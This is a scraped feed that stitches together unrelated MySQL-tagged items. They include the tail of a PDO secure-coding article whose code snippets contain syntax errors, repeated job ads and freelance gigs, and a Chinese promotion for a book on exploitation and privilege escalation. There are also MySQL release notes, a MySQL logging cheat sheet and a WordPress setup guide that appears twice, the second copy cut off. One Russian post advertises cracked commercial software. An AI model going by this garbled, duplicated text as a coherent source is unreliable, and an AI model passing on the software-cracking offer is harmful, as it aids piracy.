$stmt = $pdo->prepare("SELECT * FROM foo WHERE first_name = ? AND last_name = ?"); if ($stmt->execute([$_GET['first_name'], $_GET['last_name'])) { $users = $stmt->fetchAll(PDO::FETCH_ASSOC); } else { // Handle error here. } $args = [ json_encode($_GET) (new DateTime())->format('Y-m-d H:i:s') ]; $insert = $pdo->prepare("INSERT INTO foo_log (params, time) VALUES (?, ?);"); if (!$insert->execute($args)) { // Handle error here. }

...you can just write your code like this:

try { $stmt = $pdo->prepare("SELECT * FROM foo WHERE first_name = ? AND last_name = ?"); $stmt->execute([$_GET['first_name'], $_GET['last_name']); $users = $stmt->fetchAll(PDO::FETCH_ASSOC); $args = [ json_encode($_GET), (new DateTime())->format('Y-m-d H:i:s') ]; $pdo->prepare("INSERT INTO foo_log (params, time) VALUES (?, ?);") ->execute($args); } catch (PDOException $ex) { // Handle error here. }

Better security, brevity, and better readability. What more could you ask for?

Let's Make Secure the Norm

It's up to us software developers to make the applications we develop secure from malicious actors. We're the ones on the front lines (with our system administrators, when we don't also fulfill that role) defending against zero-day vulnerabilities.

Not the politicians. Not the Anti-Virus vendors. Not the forensic investigators.

Security starts with the developers.

Paragon Initiative Enterprises develops tools and platforms designed to be secure by default to reduce the cognitive load on our clients and peers. We share a lot of our innovations (both big and small) with the community through our Github organization . We offer technology consultation services for companies that lack comparable expertise or are otherwise concerned about the security of their network or their platform.

In the coming weeks, we will be discussing other common security vulnerabilities that suffer from the proliferation of bad or useless advice, as well as some projects the works. We challenge other library and framework developers to take some time to consider design strategies for their own projects that make it easier to do things the secure way than to do things the insecure way.Shoot us an email if you need help.

Update

We've updated this post to reflect suggestions from three members of the PHP developer community, @htimoh , @enygma , and @suckup_de , to explain identifier escaping and input validation.


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SoftoRooM -> Exportizer Pro 7.0.2      Cache   Translate Page      
PRYANIK:
Твой софтовый форум: SoftoRooM
Exportizer Pro 7 0.2 + crack (patch)


Цитата( Exportizer Pro 7 0 2 ):
    Improvements in interface when working with MySQL, PostgreSQL, SQLite and SQL Server databases.
    Minor changes.


медицина в комплекте
Скрытый текст!
Подробности на форуме...

Exportizer Pro 7.0.2
источник: www.softoroom.net

          新书推荐 | 网络攻防实战研究:漏洞利用与提权 - 安全客,安全资讯平台      Cache   Translate Page      

点击购买《网络攻防实战研究:漏洞利用与提权》

2018最后一个法定节假日已经过完了,距离2018结束你的余额仅仅还有82天。最新公布的中国锦鲤也不是你,勉强称自己是中国咸鱼罢了。不知道现在你内心是不是这么想的:“反正2018也就这样了,还剩下两个多月的时间,这剩下的时间也做不了什么事,不如干脆放开玩,等2019再努力~ ”

image

是不是感觉哪里有一丝丝不对,是的。因为2018还没有结束啊!

剩下最后两个月的时间,除了放肆玩耍~也应该尝试做一个有逼格的安全知识分子来等待2018的结束,即使被人诟病,也可以随手拿出一本书说,看!我怎么可能啥也没干,我利用了最后的两个月深刻的充实了自己,把握住最后的时光自我升华,得道升天,哦不,进行知识的渗透式填充以及理想和精神境界的利用提权。

image

那么!到了最关键的选择时刻,究竟什么样的书才能充分展现你的个人的光辉呢!

就! 是!他!

本书营造了在案例中学习漏洞利用与提权技术的实战环境,涵盖了Windows及Linux的漏洞利用与安全防范,以及MSSQL、MySQL、Oracle、Metasploit和Serv-U、Winmail、Radmin、pcAnywhere、JBoss、Struts、JspRun、Gene6 FTP Server、Tomcat、Citrix、VNC、ElasticSearch、Zabbix等的漏洞利用与提权,每一节介绍一个典型应用,为网络攻防打下了坚实基础。

内容简介

本书主要讨论目前常见的漏洞利用与提权技术,分别从攻击和防御的角度介绍渗透过程中相对最难,同时又是渗透最高境界的部分——如何获取服务器乃至整个网络的权限。本书共分9章,由浅入深,按照读者容易理解的方式对内容进行分类,每一节介绍一个典型应用,同时结合案例进行讲解,并给出一些经典的总结。本书的目的是介绍漏洞利用与提权技术,结合一些案例来探讨网络安全,从而远离黑客的威胁。通过本书的学习,读者可以快速了解和掌握主流的漏洞利用与提权技术,加固自己的服务器。

本书既可以作为政府、企业网络安全从业者的参考资料,也可以作为大专院校信息安全学科的教材。

作者简介

主编介绍

祝烈煌 北京理工大学计算机学院副院长,教授,博士生导师。教育部新世纪优秀人才,中国网络空间安全协会理事,中国人工智能学会智能信息网络专委会主任委员,中国计算机学会YOCSEF副主席。长期从事网络与信息安全方面的研究工作,承担国家重点研发计划课题、国家自然科学基金等科研项目10余项。出版外文专著1本,发表SCI/EI检索学术论文100余篇,获省部级科技奖励1项。

张子剑 北京理工大学讲师,博士,硕士生导师。曾主持国家自然科学基金1项,重点研发计划子课题1项。参与编写《信息安全技术 可信计算规范 可信连接架构》(GB/T 29828-2013)安全标准,出版外文专著1本,发表SCI/EI检索学术论文30余篇。

作者介绍

陈小兵 高级工程师,51CTO技术专家,北京理工大学在读博士,主要研究方向为网络攻防技术及安全体系建设。出版图书《SQL Server 2000培训教程》《黑客攻防实战案例解析》《Web渗透技术及实战案例解析》《安全之路:Web渗透技术及实战案例解析(第2版)》《黑客攻防:实战加密与解密》,在《黑客防线》《黑客X档案》《网管员世界》《开放系统世界》《视窗世界》等杂志及先知、FreeBuf、51CTO、安全智库等网站发表文章200余篇。

张胜生 信息安全讲师,网络安全专家,研究生导师,现任北京中安国发信息技术研究院院长。翻译《CISSP认证考试指南(第6版)》,主持开发设计中国信息安全认证中心CISAW认证应急服务方向课程体系和实操考试平台,曾获中国信息安全攻防实验室产品实战性和实用性一等奖。

王坤 江苏省电子信息产品质量监督检验研究院(江苏省信息安全测评中心)检测工程师,主要研究方向为风险评估、等级保护、渗透测试、工控系统安全。2007年起接触网络安全,在《黑客防线》《非安全》《黑客X档案》等杂志发表文章数十篇,曾获2013年ISG信息安全技能竞赛个人赛二等奖、2014年“湖湘杯”全国网络信息安全公开赛二等奖等。

徐焱 现任北京交通大学长三角研究院科教发展部部长。2002年起接触网络安全,对Web安全有浓厚的兴趣,擅长Metasploit和内网渗透。出版图书《Web高级渗透实用指南》,在《黑客X档案》《黑客手册》等杂志及FreeBuf、安全客、先知、嘶吼等网站发表了多篇技术文章。

大咖推荐

在安全行业从业这么多年,回过头来发现,和小兵居然相识10年了。作为10年前就对网络安全有浓厚兴趣,在安全圈子里扎根、生长的技术人,小兵的自学能力和分享精神都是我所佩服的。

我一直认为,安全人才没有办法定向培养,只能依赖天赋,而我们要做的就是发掘和激发少部分人的天赋,最好的办法则是通过活生生的案例引发兴趣,让兴趣成为最好的导师。这本书也和小兵的为人一样实在,有大量干货、新货,能帮助刚对安全产生兴趣却不知道从哪里入手的读者快速入门、上手,通过本书捅破那层“窗户纸”,找到自己感兴趣的新领域。阅读本书,你将在网络安全的路上走得更快、更远!

360网络攻防实验室负责人

陆羽(林伟)

在经典的渗透测试过程中,有很多行之有效的漏洞利用及相关场景下的提权思路,这本书对这些内容做了全面的介绍。这本书不仅覆盖攻击,还详细讲解了相应的防御方法,内容皆来自一线实战,值得参考。

《Web前端黑客技术揭秘》作者

余弦

Shadow Brokers发布“NSA武器库”在网络世界所造成的影响,让我们感受到了“渗透之下,漏洞利用工具为王”的可怕。当漏洞利用工具并不完备时,网络渗透测试就无法有效地进行了吗?显然不是这样的。渗透的精髓在于组合与细节利用,在一万种网络系统环境中有一万种渗透思路和方法。这种极具创造性的“入侵”行为体现了渗透测试人员的能力与水平,经验老道的安全人员总有自己独特的“奇淫技巧”,这些技巧就像弹药一样,根据渗透目标的不同有的放矢,以最终获得目标高权限为结果的过程是有趣的且具有艺术性的。我想,这就是渗透测试的魅力所在。当一个安全人员通过别人从未尝试过的“组合拳”最终渗透了目标时,他所收获的成就感是无与伦比的。每个安全人员都对拥有大师级的网络渗透技术梦寐以求,而获得此水平的前提就在于基础一定要扎实,如果现在有一万种渗透技巧存在,那就将它们融会贯通,唯有消化和吸收了所有已知的渗透技巧,才能进一步缔造崭新的攻防手法。

本书是一本渗透技巧极其丰富的工具书,涵盖了渗透测试中绝大部分环境下的攻防利用之道,是初学者打基础、高手查缺补漏的绝佳教材。

360独角兽安全团队创始人

杨卿

文末福利

看到这里,是不是早已经按奈不住心中的激动想要去网上商城购买了,OMG,90.3元,买不起!买不起!

小安现在要告诉你,这可能是你和这本书面对面不花一分钱的完美机会~

活动规则:

直接在下方留言,说出你想要这本书的理由以及你对这本书的看法,15字以上。并转发本篇文章到朋友圈给留言集赞,我们将从文章下方留言处抽选点赞数最高的10粉丝赠送《网络攻防实战研究:漏洞利用与提权》一本!

截止日期 :2018年10月15日16:00

备注:

1.请务必登录之后评论,不要使用游客账号

2.请务必将本篇转发至朋友圈,截图将作为最后领取书籍的必备钥匙

往往最先行动的人总会成功,下方留言等你哦❤


          Fatal error: Uncaught Error: Call to undefined function odbc_connect()      Cache   Translate Page      

Fatal error: Uncaught Error: Call to undefined function odbc_connect()

Respuesta a Fatal error: Uncaught Error: Call to undefined function odbc_connect()

El asunto es que tengo un examen de PHP la semana que viene y necesito hacer uso de todos los modos de conexión posibles a MySQL, jajaja... Los .dll existen, y los volví a descomprimir esta semana a partir del .rar oficial de PHP, por lo que supongo que no están corruptos.

Publicado el 10 de Octubre del 2018 por Optigan

          Timbrado de factura      Cache   Translate Page      

Timbrado de factura

Buen día, soy nuevo en el área de facturación web, me gustaría saber algunas opiniones:

Actualmente hago el timbrado de la factura y guardo los datos generales de ella en mysql, pero de los datos de timbrado solo guardo el UUID por si se pierde el xml poderlo recuperar.
se requiere generar un pdf de la factura:
me recomiendan leer los datos de mysql por medio de consulta o leerlos a partir del XML timbrado para formar el pdf?
Actualmente lo hago del xml junto...

Publicado el 09 de Octubre del 2018 por Alejandro

          The MySQL 8.0.13 Maintenance Release is Generally Available      Cache   Translate Page      
The MySQL Development team is very happy to announce that MySQL 8.0.13, the second 8.0 Maintenance Release, is now available for download at dev.mysql.com. In addition to bug fixes there are a few new features added in this release.  Please download 8.0.13 from dev.mysql.com or from the MySQL  Yum,  APT, or SUSE repositories.…
          FOSDEM 2019      Cache   Translate Page      
The FOSDEM organization just confirmed that again this year the ecosystem of your favorite database will have its Devroom ! More info to come soon, but save the day: 2 & 3rd February 2019 in Brussels ! It seems the MySQL & Friends Devroom  (MariaDB, Percona, Oracle, and all tools in the ecosystem) will be held on Saturday (to be confirmed). Stay tuned !
          Announcement: Second Alpha Build of Percona XtraBackup 8.0 Is Available      Cache   Translate Page      
The second alpha build of Percona XtraBackup 8.0.2 is now available in the Percona experimental software repositories. Note that, due to the new MySQL redo log and data dictionary formats, the Percona XtraBackup 8.0.x versions will only be compatible with MySQL 8.0.x and Percona Server for MySQL 8.0.x. This release supports backing up Percona Server 8.0 Alpha. For experimental migrations from earlier database server versions, you will need to backup and restore and using XtraBackup 2.4 and then use mysql_upgrade from MySQL 8.0.x PXB 8.0.2 alpha is available for the following platforms: RHEL/Centos 6.x RHEL/Centos 7.x Ubuntu 14.04 Trusty* Ubuntu 16.04 Xenial Ubuntu 18.04 Bionic Debian 8 Jessie* Debian 9 Stretch Information on how to configure the Percona repositories for apt and yum systems and access the Percona experimental software is here. * We might drop these platforms before GA release. Improvements PXB-1658: Import keyring vault plugin from Percona Server 8 PXB-1609: Make version_check optional at build time PXB-1626: Support encrypted redo logs PXB-1627: Support obtaining binary log coordinates from performance_schema.log_status Fixed Bugs PXB-1634: The CREATE TABLE statement could fail with the DUPLICATE KEY error PXB-1643: Memory issues reported by ASAN in PXB 8 PXB-1651: Buffer pool dump could create a (null) file during prepare stage of Mysql8.0.12 data PXB-1671: A backup could fail when the MySQL user was not specified PXB-1660: InnoDB: Log block N at lsn M has valid header, but checksum field contains Q, should be P Other bugs fixed: PXB-1623, PXB-1648, PXB-1669, PXB-1639, and PXB-1661. The post Announcement: Second Alpha Build of Percona XtraBackup 8.0 Is Available appeared first on Percona Database Performance Blog.
          Re: MySQL upgrade issue (mysql_upgrade fails)      Cache   Translate Page      
I have the same issue, upgraded to 5.7.23 using AWS Console
          Bitcoin fork - Upwork      Cache   Translate Page      
I need bitcoin forked and start at my server centralized blockchain with PoT or PoS to make bitcoin transfers free of charge and wallets generation unlimited for users of the blockchain. While outgoing and ingoing to other bitcoin network payments will cost some Gas if I ma not mistaken it is 21000 gas per payment now. This blockchain must have some API to build frontend and backend on php, mysql.
I need rough evaluation of time and money required to have it done and list of questions I must answer to launch this project.


Posted On: October 10, 2018 15:41 UTC
Category: Web, Mobile & Software Dev > Other - Software Development
Country: Lithuania
click to apply
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          App Developer - TeamLinkt (QuickLinkt) - Saskatoon, SK      Cache   Translate Page      
Experience with Web &amp; Server-side development is a plus (jQuery, MVC, PHP, MySql). Are you an experienced hands-on iOS and Android developer and love what you...
From Indeed - Wed, 26 Sep 2018 20:53:30 GMT - View all Saskatoon, SK jobs
          Web Developer - New Roots Herbal - Tessier, SK      Cache   Translate Page      
Strong experience with PHP, MySQL, HTML 5, CSS 3, JavaScript, jQuery, Laravel, Drupal, Joomla; New Roots Herbal is a leading national manufacturer and...
From New Roots Herbal - Tue, 17 Jul 2018 23:03:24 GMT - View all Tessier, SK jobs
          The Ultimate Beginner’s Guide to Setting Up & Running a WordPress Site      Cache   Translate Page      

So you've decided to run a WordPress site but have no idea where to start? This tutorial is aimed at absolute beginners. Some IT knowledge will help but I presume you want to learn the essentials within a few hours. Let's get started.

Step 1: What Do You Want to Achieve?

A little planning goes a long way. Be honest with yourself: why are you considering WordPress? Do you want to:

  • create a business website?
  • document your life, hobby or interests?
  • start an amazing web design agency?
  • learn to write code?
  • do something else?

WordPress is flexible and runs almost a third of the web — but it's not ideal for every situation. A website or article library is perfect. Creating a social network or online shop is possible but there may be better options. Using WordPress to learn PHP could be a frustrating experience.

Presuming WordPress is appropriate, are you interested in the technicalities or would you simply prefer to write content? If it's the latter, a managed WordPress plan from SiteGround or an account at WordPress.com will get you running without the hassles of installation and server management.

The moral: define the problem before choosing a solution!

Step 2: Plan Your Content

Ideally, you should have all your content written before building a site. It's the best way to plan a structure and will influence your design. No one ever does that, but at least plan a few general concepts so you have somewhere to start.

Step 3: Purchase a Domain Name

A domain name is your primary web address, e.g. www.mysite.com. Keep it short and use keywords appropriate to your content. This can be tougher than it sounds; most good names were registered years ago.

Use a reputable domain registrar. Prices vary across countries and top-level-domain types (.com, .net, .org, .ninja etc), but expect to pay around $25 for a new domain for a couple of years. Buying a decent pre-registered domain from someone else can be considerably more expensive.

Step 4: Purchase a Hosting Plan

Your site needs to be hosted somewhere. Its files must be placed on a device which understands how to deal with web requests: a web server. You could serve everything from your desktop PC but it quickly becomes impractical.

Buy a suitable plan from a respected host such as SiteGround. A WordPress-compatible shared hosting plan costs a few dollars a month and you can upgrade disk space and bandwidth as traffic grows.

You will then need to 'point' your domain at your new web space. This is normally done by logging into your domain registrar's control panel then either:

  1. Setting the host as the DNS nameserver, or
  2. Changing the domain's DNS A records to point at the host's IP address.

All hosts and domain registrars provide guidance but you may need to seek expert assistance. Domain changes can take up to 48 hours to propagate so you may need to wait before moving to the next step.

Step 5: Set Up SSL

Secure Socket Layer (SSL) certificates enable cryptographic protocols on your website so it is served over an https:// address rather than http://. All communication between your server and the user's browser is encrypted so it cannot be (easily) intercepted by a third party.

Configuring SSL is an optional step but highly recommended:

  1. Browsers warn when a site is not secure especially when completing forms or sending data.
  2. Search engines rank secure sites higher than non-secure equivalents.
  3. SSL is essential if you eventually want a Progressive Web App which allows your site to be "installed" and work offline.
  4. Adding SSL later is considerably more difficult. You may need to reinstall WordPress and search engine indexing can be affected.
  5. There are no disadvantages. HTTPS can be added for free and is negligibly slower than unencrypted HTTP (it can be considerably faster when used with HTTP/2).

Hosts often allow you to install a certificate purchased elsewhere, but it's easier to use their own service. For example, SiteGround provides a free Let's Encrypt option in the security section of your site's cPanel. Click that, hit Install and SSL is enabled.

enable SSL

Step 6: Install WordPress

WordPress is a complex application which requires:

  1. A back-end MySQL database where your configuration, posts, comments and other information is retained. This must be installed and configured first. A database user ID and password must be defined so applications can store and retrieve data.
  2. A large set of PHP files which form the WordPress application. These must be copied to the server prior to running a set-up procedure. This requests the database credentials before creating the database tables and initial data.
  3. After installation, WordPress communicates with the database using the ID and password to enable editing and presentation of pages.

The majority of hosts provide cPanel - a popular website management facility. You can create your database, upload WordPress and install manually. For full instructions, refer to How to Create WordPress MySQL Databases on cPanel.

Fortunately, there is an easier option. Search or browse for the WordPress options in cPanel:

Install WordPress via cPanel

Click the WordPress Installer to open the installation panel:

WordPress installation options

Define the following settings:

  • https:// for the protocol if you enabled SSL in step 5. (You can also choose whether the domain uses the initial 'www' or not).
  • Your primary domain. (There will only be one choice unless you have multiple domains pointed at the hosting plan).
  • The directory should be left blank to install WordPress in the root folder. Only change this if you want to run it from another folder, e.g. https://mysite.com/blog/
  • The name and description of your new site.
  • Keep Multisite unchecked unless you're intending to run more than one WordPress site on the same space.
  • Enter an Admin Username and Password. You will use these to log into WordPress so ensure they're strong (NOT 'admin' and 'password'!) and you keep them in a safe place.
  • Enter your Email. WordPress uses this to send you notifications when necessary.

The other options can normally be left as the default settings. Hit Install and wait a few minutes for the installation process to complete. You will be given a link to the main site (https://mysite.com/) and the WordPress control panel (https://mysite.com/wp-admin) where you can log in with your administrative username and password.

Step 7: Initial WordPress Configuration

Don't be tempted to start publishing content just yet! It's best to configure WordPress from the Settings menu before going further:

WordPress settings

The following sections describe the basic WordPress settings but note that installed themes and plugins can override these options.

General

This pane allows you to change various aspects about your installation. The primary settings to change include:

  • The Timezone. This may default to UTC so choose an appropriate city instead.
  • The Date Format. Choose an appropriate option or enter a custom string using PHP's date format
  • The Time Format. Similarly, choose an option or enter your own.

Remember to hit Save Changes once finished.

Writing

The main settings to change in this pane are:

  • The Default Post Category. Post categories are defined in Posts > Categories.
  • The Default Post Format. WordPress themes often provide different post types such as standard articles, galleries and video pages. Choose whichever you will use most often.

Reading

The Front page displays setting allows you to set whether your latest posts or a static page is presented on the home page.

The other default settings are normally fine, although you may want to temporarily disable Search Engine Visibility during the initial stages of building your site. Don't forget to enable it before going live!

Discussion

This pane controls commenting. The main setting is Allow people to post comments on new articles which you may want to disable if you don't require comments.

The post The Ultimate Beginner’s Guide to Setting Up & Running a WordPress Site appeared first on SitePoint.


          ionic firebase push notificatio       Cache   Translate Page      
need ionic developer i have an app which is connected with php and mysql . in the app there is admin and users. i implement ionic firebase push notification in the app . and its work fine but know i want when the admin click on message it hase 2 fiels title and message ... (Budget: $10 - $30 USD, Jobs: Android, Mobile App Development)
          Copying a site without access to the MySQL export      Cache   Translate Page      
According to https://www.wpexplorer.com/migrating-wordpress-website/ and in order to migrate a WP website to another host, one needs to export the WP MySQL database. What I have is a “complete” (7 GB) backup of the files from my site. However, the old service provider is now closed and I don’t have access to it any more. So […]
          Remote Senior Web Application Full Stack Developer      Cache   Translate Page      
A technology company is filling a position for a Remote Senior Web Application Full Stack Developer. Individual must be able to fulfill the following responsibilities: Architect and implement the next generation of products Implement front and back-end web application Develop API, and create workflows and toolchains for a new product line Position Requirements Include: Have 4+ years experience in full stack web development Proficiency in HTML5, CSS, Javascript, jQuery, React/Redux or Angular Proficiency in NodeJS, MySQL, Amazon SQS Familiar with enterprise application infrastructure and security requirements Ablility to write clean and maintainable code in a team environment Familiar with ReactJS, Vue, or other Javascript frameworks
          PHP + Macros + Xampp. Need a script who buys items automaticly whenever they uploaded on a website list      Cache   Translate Page      
Are you familiar with PHP , Macros, xampp ? I need a script or setup, which buy's my selected items from my selected web store. Buying items is easy, just need to find a right column in a website. will... (Budget: £20 - £250 GBP, Jobs: HTML, MySQL, PHP, Software Architecture, Web Scraping)
          PHP + Macros + Xampp. Need a script who buys items automaticly whenever they uploaded on a website list      Cache   Translate Page      
Are you familiar with PHP , Macros, xampp ? I need a script or setup, which buy's my selected items from my selected web store. Buying items is easy, just need to find a right column in a website. will... (Budget: £20 - £250 GBP, Jobs: HTML, MySQL, PHP, Software Architecture, Web Scraping)
          Quality Engineer - WorkMarket - Toronto, ON      Cache   Translate Page      
AWS, Consul, Nomad, TerraForm, Vault, Salt, MySQL/RDS. 129 Spadina Avenue Suite 400, Toronto, ON M5V 2L3....
From WorkMarket - Sat, 29 Sep 2018 06:21:19 GMT - View all Toronto, ON jobs
          I can't see the emails when receive questions!      Cache   Translate Page      
I want a script or something to help me with my problem! I can't see the emails when receive questions! Can you help me to see the peoples emails? Thanks (Budget: $250 - $750 USD, Jobs: Javascript, MySQL, PHP, Python, Software Architecture)
          Need Bot Developer      Cache   Translate Page      
I am looking for a specialty 'event' bot for my server. What I would like this bot to be capable of is giving a user who runs it's command (ie. !event) a random role from a list of holiday roles So essentially... (Budget: $30 - $250 USD, Jobs: Google Chrome, Javascript, MySQL, PHP, Software Architecture)
          Web Developer for new website      Cache   Translate Page      
I am looking for a web developer to help build a new website. I need account login functionality with additional features. (Budget: $1500 - $3000 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Redesign car rental reservations system.      Cache   Translate Page      
We have a current car rental reservation system made in custom php and we need to do some modifications to the back-end. Need to convert all pages to responsive and also add some new features to the back end... (Budget: $750 - $1500 USD, Jobs: AJAX, HTML, MySQL, PHP, Website Design)
          Updated LimeSurvey to 3.15.0+      Cache   Translate Page      
LimeSurvey (ID : 60) package has been updated to version 3.15.0+. LimeSurvey (formerly PHPSurveyor) is an open source online survey application written in PHP based on a MySQL, PostgreSQL or MSSQL database. It enables users without coding knowledge to develop, publish and collect responses to surveys. Surveys can include branching, custom preferred layout and design … Continue reading "Updated LimeSurvey to 3.15.0+"
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          MYSQL日志查询      Cache   Translate Page      
##通用查询日志:记录建立的客户端连接和执行的语句
##慢查询日志:记录所有执行时间超过long_query_time值的所有查询或者不使用索引的查询
##查看数据库版本
SHOW VARIABLES LIKE '%version%';
##查看通用查询日志
SHOW VARIABLES LIKE '%general%';
##设置通用查询日志为开启
SET GLOBAL general_log=ON;
##设置通用查询日志为关闭
SET GLOBAL general_log=OFF;
##查看当前慢查询日志输出的格式,可以是FILE(存储在数数据库的数据文件中的hostname.log),也可以是TABLE(存储在数据库中的mysql.general_log)
SHOW VARIABLES LIKE '%log_output%';
##设置查询日志输出到文件
SET GLOBAL log_output='file';
##设置慢查询日志保存的文件
SET GLOBAL slow_query_log_file="/var/lib/mysql/localhost-slow.log";
##查看慢查询相关设置
SHOW VARIABLES LIKE '%slow_query%';
##设置慢查询阈值为1,默认为10
SET GLOBAL long_query_time=1;
##设置慢查询阈值为10,默认为10
SET GLOBAL long_query_time=10;
##查看慢查询的阈值
SHOW GLOBAL VARIABLES LIKE '%long_query_time%';
##查看有多少慢查询
SHOW GLOBAL STATUS LIKE '%Slow_queries%';
##睡眠11秒,测试慢查询
##select SLEEP(11);


筱 筱 2018-10-09 16:59 发表评论

          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          project for Govind      Cache   Translate Page      
Need to update an online portal as discussed. (Budget: $30 - $250 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Logde and restaurant software      Cache   Translate Page      
Looking for restaurant and lodge billing software to work on internet or backup mode. If you can provide app that also helps. (Budget: $30 - $250 USD, Jobs: Android, Excel, MySQL, PHP)
          Software Developer - Autodata Solutions - Calgary, AB      Cache   Translate Page      
PHP / XML / other scripting languages. Develop database-driven websites and web video products using PHP, HTML5, CSS3, JavaScript/jQuery, XML, LAMP, MySQL,...
From Autodata Solutions - Wed, 19 Sep 2018 19:43:16 GMT - View all Calgary, AB jobs
          SoftoRooM -> Exportizer Pro 7.0.2      Cache   Translate Page      
PRYANIK:
Твой софтовый форум: SoftoRooM

Exportizer Pro 7 0.2 + crack (patch)


Цитата( Exportizer Pro 7 0 2 ):
    Improvements in interface when working with MySQL, PostgreSQL, SQLite and SQL Server databases.
    Minor changes.


медицина в комплекте
Скрытый текст!
Подробности на форуме...

Exportizer Pro 7.0.2
источник: www.softoroom.net

          Technical Architect (Salesforce experience required) Casper - Silverline Jobs - Casper, WY      Cache   Translate Page      
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. BA/BS in Computer Science, Mathematics, Engineering, or similar technical degree or...
From Silverline Jobs - Sat, 23 Jun 2018 06:15:28 GMT - View all Casper, WY jobs
          Software Build Engineer - Leidos - Cheyenne, WY      Cache   Translate Page      
G., Oracle, MySQL, PostgreSQL, SQL Server, etc.). Our Company is a science and technology solutions leader built on a legacy of daring innovation and...
From Leidos - Thu, 27 Sep 2018 17:32:16 GMT - View all Cheyenne, WY jobs
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with MySQL, Microsoft SQL Server, and Oracle databases. Interface with stakeholders and end users to clarify requirements and complete software...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          The Ultimate Beginner’s Guide to Setting Up & Running a WordPress Site      Cache   Translate Page      

So you've decided to run a WordPress site but have no idea where to start? This tutorial is aimed at absolute beginners. Some IT knowledge will help but I presume you want to learn the essentials within a few hours. Let's get started.

Step 1: What Do You Want to Achieve?

A little planning goes a long way. Be honest with yourself: why are you considering WordPress? Do you want to:

  • create a business website?
  • document your life, hobby or interests?
  • start an amazing web design agency?
  • learn to write code?
  • do something else?

WordPress is flexible and runs almost a third of the web — but it's not ideal for every situation. A website or article library is perfect. Creating a social network or online shop is possible but there may be better options. Using WordPress to learn PHP could be a frustrating experience.

Presuming WordPress is appropriate, are you interested in the technicalities or would you simply prefer to write content? If it's the latter, a managed WordPress plan from SiteGround or an account at WordPress.com will get you running without the hassles of installation and server management.

The moral: define the problem before choosing a solution!

Step 2: Plan Your Content

Ideally, you should have all your content written before building a site. It's the best way to plan a structure and will influence your design. No one ever does that, but at least plan a few general concepts so you have somewhere to start.

Step 3: Purchase a Domain Name

A domain name is your primary web address, e.g. www.mysite.com. Keep it short and use keywords appropriate to your content. This can be tougher than it sounds; most good names were registered years ago.

Use a reputable domain registrar. Prices vary across countries and top-level-domain types (.com, .net, .org, .ninja etc), but expect to pay around $25 for a new domain for a couple of years. Buying a decent pre-registered domain from someone else can be considerably more expensive.

Step 4: Purchase a Hosting Plan

Your site needs to be hosted somewhere. Its files must be placed on a device which understands how to deal with web requests: a web server. You could serve everything from your desktop PC but it quickly becomes impractical.

Buy a suitable plan from a respected host such as SiteGround. A WordPress-compatible shared hosting plan costs a few dollars a month and you can upgrade disk space and bandwidth as traffic grows.

You will then need to 'point' your domain at your new web space. This is normally done by logging into your domain registrar's control panel then either:

  1. Setting the host as the DNS nameserver, or
  2. Changing the domain's DNS A records to point at the host's IP address.

All hosts and domain registrars provide guidance but you may need to seek expert assistance. Domain changes can take up to 48 hours to propagate so you may need to wait before moving to the next step.

Step 5: Set Up SSL

Secure Socket Layer (SSL) certificates enable cryptographic protocols on your website so it is served over an https:// address rather than http://. All communication between your server and the user's browser is encrypted so it cannot be (easily) intercepted by a third party.

Configuring SSL is an optional step but highly recommended:

  1. Browsers warn when a site is not secure especially when completing forms or sending data.
  2. Search engines rank secure sites higher than non-secure equivalents.
  3. SSL is essential if you eventually want a Progressive Web App which allows your site to be "installed" and work offline.
  4. Adding SSL later is considerably more difficult. You may need to reinstall WordPress and search engine indexing can be affected.
  5. There are no disadvantages. HTTPS can be added for free and is negligibly slower than unencrypted HTTP (it can be considerably faster when used with HTTP/2).

Hosts often allow you to install a certificate purchased elsewhere, but it's easier to use their own service. For example, SiteGround provides a free Let's Encrypt option in the security section of your site's cPanel. Click that, hit Install and SSL is enabled.

enable SSL

Step 6: Install WordPress

WordPress is a complex application which requires:

  1. A back-end MySQL database where your configuration, posts, comments and other information is retained. This must be installed and configured first. A database user ID and password must be defined so applications can store and retrieve data.
  2. A large set of PHP files which form the WordPress application. These must be copied to the server prior to running a set-up procedure. This requests the database credentials before creating the database tables and initial data.
  3. After installation, WordPress communicates with the database using the ID and password to enable editing and presentation of pages.

